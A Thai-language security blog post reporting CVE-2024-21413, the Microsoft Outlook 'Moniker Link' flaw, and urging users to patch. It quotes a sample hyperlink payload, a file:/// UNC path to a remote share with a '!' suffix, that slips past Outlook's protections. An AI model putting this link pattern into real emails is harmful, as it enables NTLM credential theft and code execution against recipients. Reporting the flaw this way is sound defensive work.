15/02/2567

ช่องโหว่ RCE บน Microsoft Outlook กำลังถูกใช้เป็นช่องทางการโจมตี


    Microsoft กล่าวว่าผู้โจมตีที่ไม่ได้รับการรับรองจากระยะไกลสามารถใช้ประโยชน์จากช่องโหว่ด้านความปลอดภัยของ Outlook ที่สำคัญได้เล็กน้อย ซึ่งทำให้พวกเขาข้ามผ่าน Office Protected View อยู่ในขณะนี้
ผู้เชี่ยวชาญด้านความปลอดภัยของ Check Point ถูกติดตามโดยเลข CVE-2024-21413 เป็นช่องโหว่ที่ผู้ไม่ประสงค์ดีสามารถเรียกใช้การโจมตีได้จากระยะไกล (RCE) โดยลิงก์นั้นถูกส่งมาโดยใช้ MS Outlook เวอร์ชั่นที่มีช่องโหว่
    เมื่อเป้าหมายได้รับ และกดเข้าไปในลิงก์ที่แนบมา เนื่องจากใช้งาน Outlook ที่มีช่องโหว่อยู่ทำให้การส่งอีเมลนั้น สามารถหลบเลี่ยงการตรวจสอบความปลอดภัยได้
   ผู้เชี่ยวชาญด้านความปลอดภัย ยังออกมาเจือนเพิ่มเติมอีกว่า Preview Pane เป็นเวคเตอร์การโจมตีสำหรับข้อบกพร่องด้านความปลอดภัยนี้ ช่วยให้สามารถใช้ประโยชน์ได้สำเร็จแม้ว่าจะดูตัวอย่างเอกสาร Office ที่ออกแบบมาเพื่อประสงค์ร้ายก็ตาม ผู้ไม่ประสงค์ดีอาจจะใช้สิทธิ์ระดับสูง ซึ่งจะสามารถ อ่าน เขียน ลบแก้ไขไฟล์ได้ด้วย
    CVE-2024-21413 เป็นช่องโหว่ที่มีผลกระทบกับผลิตภัณฑ์ของ MS Office หลายรายการ รวมไปถึง Microsoft Office LTSC 2021 และ Microsoft 365 Apps for Enterprise รวมถึง Microsoft Outlook 2016 และ Microsoft Office 2019

การใช้เครื่องหมาย "ฟันหนู" เพื่อหลบเลี่ยงการตรวจสบความถูกต้อง
    จากการตรวจสอบของ Check Point ช่องโหว่ที่ถูกเรียกว่า Moniker Link ช่วยให้ผู้โจมตีสามารถหลบเลี่ยงการตรวจสอบความถูกต้องของ Outlook โดยลิงค์จะอยู่ในอีเมล ถูกซ่อนใว้ด้วยเครื่องหมาย ฟันหนู ที่ถูกชี้ไปยังผู้โจมตี เซิร์ฟเวอร์ ดังตัวอย่างด้านล่างนี้ 
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
 ไฮเปอร์ลิงก์นี้จะข้ามข้อจำกัดด้านความปลอดภัยของ Outlook และจะเข้าถึงทรัพยากรระยะไกล "\\10.10.111.111\test\test.rtf" เมื่อมีการคลิกลิงก์โดยไม่แสดงคำเตือนหรือข้อผิดพลาดใด ๆ
ข้อบกพร่องดังกล่าวเกิดขึ้นเนื่องจาก API ที่ไม่ปลอดภัยของ MkParseDisplayName ดังนั้นช่องโหว่อาจส่งผลกระทบต่อซอฟต์แวร์อื่น ๆ ที่ใช้งานด้วย

   ผลกระทบของการโจมตีที่ประสบความสำเร็จในการใช้ประโยชน์จาก CVE-2024-21413 รวมถึงการขโมยข้อมูลประจำตัว NTLM การใช้รหัสโดยอำเภอใจผ่านเอกสาร Office ที่ออกแบบมาเพื่อทำการโจมตีเป้าหมาย
    โดยที่การโจมตีนี้จะเกิดขึ้นบนผู้ใช้งาน OS Windows 10 และ 11 บนผลิตภัณฑ์ MS365 (Office 2021) ส่วน OS และ ผลิตภัณฑ์อื่น ๆ กีอาจจะโดนโจมตีด้วยเช่นกัน ราเชื่อว่านี่เป็นปัญหาที่ถูกมองข้ามซึ่งมีอยู่ในระบบนิเวศของ Windows/COM มานานหลายทศวรรษ เนื่องจากมันอยู่ในแกนหลักของ COM API ขอแนะนำอย่างยิ่งให้ผู้ใช้ Outlook ทุกคน ให้ทำการ Update Patch อย่างโดยเร็วที่สุด

ที่
ป้ายกำกับ: , ,

ไม่มีความคิดเห็น:

แสดงความคิดเห็น

สมัครสมาชิก: ส่งความคิดเห็น (Atom)